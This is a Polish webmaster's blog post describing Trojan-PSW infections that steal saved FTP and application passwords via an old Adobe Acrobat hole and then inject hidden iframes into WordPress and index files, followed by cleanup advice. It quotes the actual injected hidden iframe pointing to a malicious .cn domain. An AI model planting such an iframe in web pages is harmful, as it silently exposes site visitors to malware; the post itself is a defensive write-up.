Dzisiaj miałem okazję zapoznać się ze skutkami działania trojanów. Przez ostatnie kilka tygodni w internecie panują odmiany wirusa Trojan-PSW (w polecanych linkach ciekawa lektura na ich temat), wykorzystuję one lukę w Adobe Acrobat <=8.1.2.
Wykradają hasła z programów: WINDOWS Commander oraz Total Commander; CuteFTP, CuteFTP PRO; Mozilli i Opery; FileZilla; Mail.Ru Agent; FAR FTP; Thunderbird; Punto Switcher; hasła do AIM, GAIM, Eudora, E-Dialer, Outlook, INETCOMM Server, CoffeeCup Software, FlashXP, MirIM, SmartFTP; itp.
Dzięki temu zdobywają dostęp do FTPów naszych strony/bloga i infekują pliki odpowiedzialne za wyświetlanie strony dodając ramkę wbudowaną (iframe) wczytującą najróżniejsze strony. W moim przypadku zostały zainfekowane wszystkie pliki index.php, favicon.ico, default-filters.php oraz pliki szablonów wordpressa, a w nich dodany iframe:
<iframe src=”http://lotmachinesguide.cn/in.cgi?income66″ width=1 height=1 style=”visibility: hidden”></iframe>
Z tego co widzę w google każdy dostawał unikalne id w linku;p Oprócz ramek wbudowanych zdarza się doklejanie skryptów.
Wizyta u lekarza:
- Przeskanuj komputer programami antywirusowymi i anty spyware.
- Zainstaluj najnowszą wersję Adobe Acrobat oraz wszystkie aktualizacje (systemu operacyjnego, antywirusów, itp.).
- Jeśli komputer jest już czysty zmień hasła dostępu do FTP oraz inne zagrożone wycieknięciem.
- Wyłącz auto uzupełnianie haseł-wpisuj hasło za każdym razem jak łączysz się z FTP (gdy ponownie zarazisz się trojan nie będzie miał tak łatwo).
- Teraz usuń wszystkie dodane fragmenty kodu (iframes, javascritps itp.) z plików na serwerze. Najprościej będzie odzyskać je z kopii bezpieczeństwa.
- Sprawdź wszystkie pliki na serwerze-usuń wszystkie nowe nieznane dla Ciebie pliki.
Wykonaj wszystkie kroki bo jeśli przywrócisz tylko kopię plików bot wróci niedługo i ponownie zainfekuje Ci stronę. Lepiej pośpiesz się ponieważ google indeksując zainfekowaną stronę przypisuje jej tytuł “strona może wyrządzić szkody”! Jeśli już google oznaczy twoją stronę jako szkodliwą przejdź do Webmaster Tools poproś o ponowne przeanalizowanie strony.
Zalecam regularnie sprawdzać witrynę za pomocą Unmask Parasites czy nie zawiera jakiś szkodników.
Polecane linki:
- http://blog.shpyo.net/?newsID=153
- http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
- http://www.wiruspc.pl/wykaz/details.php?virus=6699
- http://www.wiruspc.pl/wykaz/details.php?virus=6890
- http://www.wiruspc.pl/wykaz/details.php?virus=6915
- http://www.wiruspc.pl/wykaz/details.php?virus=7163
- http://www.wiruspc.pl/wykaz/details.php?virus=7224
- http://www.wiruspc.pl/wykaz/details.php?virus=7271
- http://www.wiruspc.pl/wykaz/details.php?virus=7272
- http://www.wiruspc.pl/wykaz/details.php?virus=7285
- http://www.wiruspc.pl/wykaz/details.php?virus=7355
Random Posts
- Bez kategorii (8)
- Blog (2)
- Filmy & animacje (15)
- Hobby & rozrywka (5)
- Komputery (3)
- Linux (2)
- Matura (7)
- Pozostałe (19)
- wat (3)
- Webmastering (3)
Blog MiChaeL_13
Oparty na WordPress